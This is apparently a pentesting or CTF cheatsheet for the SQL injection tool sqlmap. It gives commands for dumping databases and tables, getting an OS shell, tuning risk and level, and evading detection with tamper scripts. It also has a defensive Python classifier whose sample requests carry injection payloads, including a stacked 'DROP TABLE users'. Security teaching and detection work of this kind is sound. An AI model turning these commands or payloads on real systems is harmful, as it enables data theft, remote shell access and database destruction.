sqlmap.md

File metadata and controls

196 lines (140 loc) · 3.84 KB

# SQLMap

```
        ___
       __H__
 ___ ___[']_____ ___ ___  {version#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org
```

## Reference

### GET URL Param

```
sqlmap -u http://10.10.10.10/debug.php?id=1 -p "id" --dbms=mysql --dump
```

### POST body

```
sqlmap -u http://10.10.10.10/login.php --method POST --data "username=blah&password=blah&submitButton=Log+In" -p "password"
```

### Captured request (usually POST/PUT)

Save a Burp request to a file named `request.txt`:

```
sqlmap -r request.txt -p someparam
```

If there is a `Host:` header, sqlmap will figure out the target on its own.

Parameters including cookies should also be detected (probably), but don't rely on this to work.

Example credentials search workflow:

Get database names:

```
sqlmap -r request.txt --dbs
```

Get tables of a database:

```
sqlmap -r request.txt -D admin --tables
```

Dump the content of a table:

```
sqlmap -r request.txt -D "admin" -T users --dump
```

## Common Params

Parameters you want to test specifically:

```
-p "param,param2"
```

Discover databases:

```
--dbs
```

Discover tables:

```
-D "database_name"
--tables
```

Table content:

```
-T <table_name>
--dump
```

Attempt to gain a shell:

```
--os-shell
```

Specify a known database type:

```
--dbms=mysql
```

## Risk and level

```
--level <int>
--risk <int>
```

This is sadly not all that well documented, but in general `--level` increases the number of requests sent, i.e. the number of test cases for each attack type, while a higher `--risk` increases the chance of causing a denial of service (DoS) or damaging database content.

`--level` max is 5:

- level 1 default
- level 2 adds HTTP Cookie header testing
- level 3 adds HTTP User-Agent/Referer header testing
- level 4 ????
- level 5 adds Host header testing

`--risk` max is 3:

- risk 1 default
- risk 2 adds heavy time-based SQL query injections
- risk 3 adds OR-based SQL injection tests (might damage database content!)

It should be mentioned that there is no "safe" `--level` or `--risk` for running SQLMap against a production environment: you can always cause damage, depending on how poorly the API is coded by the developers.

## Get rid of cached session data

sqlmap tends to cache a lot of data, which can be annoying if there was a false positive or if you changed your captured request file. Do this to get rid of it:

```
--flush-session
--fresh-queries
```

## (Burp) Proxy

```
--proxy http://localhost:8080
```

## Technique

- Stacked queries (S)
- Union query based (U)
- Error based (E)
- Inline queries (I)
- Boolean blind (B)
- Time based blind (T)

Specify a single technique or the technique order:

```
--technique U
--technique=BEUSTQ
```

For union-based attacks you can specify the number of union columns to test if the default is too small:

```
--union-cols=11
--union-cols=1-20
```
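A defender-side companion to the level list and the technique list above: an added example, not part of this cheatsheet or of sqlmap itself, that classifies captured requests by injection point (query/body parameter, or the Cookie, User-Agent, Referer and Host headers that sqlmap only reaches at higher `--level`) and by the technique letter whose payload shape matches. It assumes requests have already been parsed into dicts with `url`, optional `body` and `headers`; the regexes and the sample traffic are constructed for illustration and deliberately do not cover tampered or encoded payloads.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Illustrative payload regexes keyed by sqlmap's technique letters (constructed for
# this example; they are not sqlmap's own payloads and will miss tampered ones).
TECHNIQUE_PATTERNS = {
    "B": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),                        # boolean blind
    "T": re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY", re.I),  # time based
    "U": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),                        # union query
    "S": re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I),           # stacked queries
    "E": re.compile(r"\b(EXTRACTVALUE|UPDATEXML)\s*\(", re.I),                    # error based
}

# Headers sqlmap only starts injecting into at the given --level (see the list above).
HEADER_LEVELS = {"Cookie": 2, "User-Agent": 3, "Referer": 3, "Host": 5}

def injection_points(request):
    """Yield (point, value, min_level) for every place a payload could arrive."""
    for src in (urlsplit(request["url"]).query, request.get("body", "")):
        for name, value in parse_qsl(src, keep_blank_values=True):
            yield f"param:{name}", value, 1          # query/body params: tested from level 1
    for header, level in HEADER_LEVELS.items():
        if header in request["headers"]:
            yield f"header:{header}", unquote_plus(request["headers"][header]), level

def classify(request):
    """Return {'sqlmap_ua': bool, 'hits': [(point, technique, min_level), ...]}."""
    hits = []
    for point, value, level in injection_points(request):
        for tech, pattern in TECHNIQUE_PATTERNS.items():
            if pattern.search(value):
                hits.append((point, tech, level))
    # The stock User-Agent is a strong signal but trivial for an operator to change.
    tool_ua = request["headers"].get("User-Agent", "").lower().startswith("sqlmap")
    return {"sqlmap_ua": tool_ua, "hits": hits}

def scan(requests):
    """Return (index, classification) for every request that looks like an attempt."""
    results = [(i, classify(r)) for i, r in enumerate(requests)]
    return [(i, c) for i, c in results if c["hits"] or c["sqlmap_ua"]]

# Constructed sample traffic modelled on the cheatsheet's targets (not real captures).
SAMPLE_REQUESTS = [
    {"url": "/debug.php?id=1", "headers": {"Host": "10.10.10.10", "User-Agent": "Mozilla/5.0"}},
    {"url": "/debug.php?id=1%20AND%201234%3D1234", "headers": {"Host": "10.10.10.10", "User-Agent": "sqlmap/1.7#stable"}},
    {"url": "/debug.php?id=1", "headers": {"Host": "10.10.10.10", "User-Agent": "Mozilla/5.0", "Cookie": "PHPSESSID=abc' AND SLEEP(5)-- "}},
    {"url": "/debug.php?id=-1%20UNION%20ALL%20SELECT%201,2,3--", "headers": {"Host": "10.10.10.10", "User-Agent": "Mozilla/5.0"}},
    {"url": "/login.php", "body": "username=a&password=b%27%3B+DROP+TABLE+users--", "headers": {"Host": "10.10.10.10", "User-Agent": "Mozilla/5.0"}},
]
```

The `min_level` in each hit tells you which `--level` an operator must have used for that injection point to be exercised at all, which helps when reconstructing how a scan was configured from logs alone.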

## Cookie

```
--cookie "cookiename=
--cookie "cookiename=cookieprefix"
```

## Unicode Nonsense

CTFs sometimes do this to make things harder for you: they throw in weird characters that are hard to work with in a UTF-8 shell. One of the following parameters might help.

Convert output to hex during retrieval:

```
--hex
```

Redump entries having the unknown character marker (?):

```
--repair
```

Character encoding for data retrieval:

```
--encoding=
```

## Detection Evasion Using Tamper Scripts

```
--tamper=charencode
--tamper=charencode,appendnullbyte,escapequotes
```

## Before and after injection point

If you consistently want to add some string data before (prefix) or after (suffix) the injected payloads, use these options, for example for brackets that need to be opened/closed to make the injection work.

```
--prefix "<str>"
--suffix "<str>"
```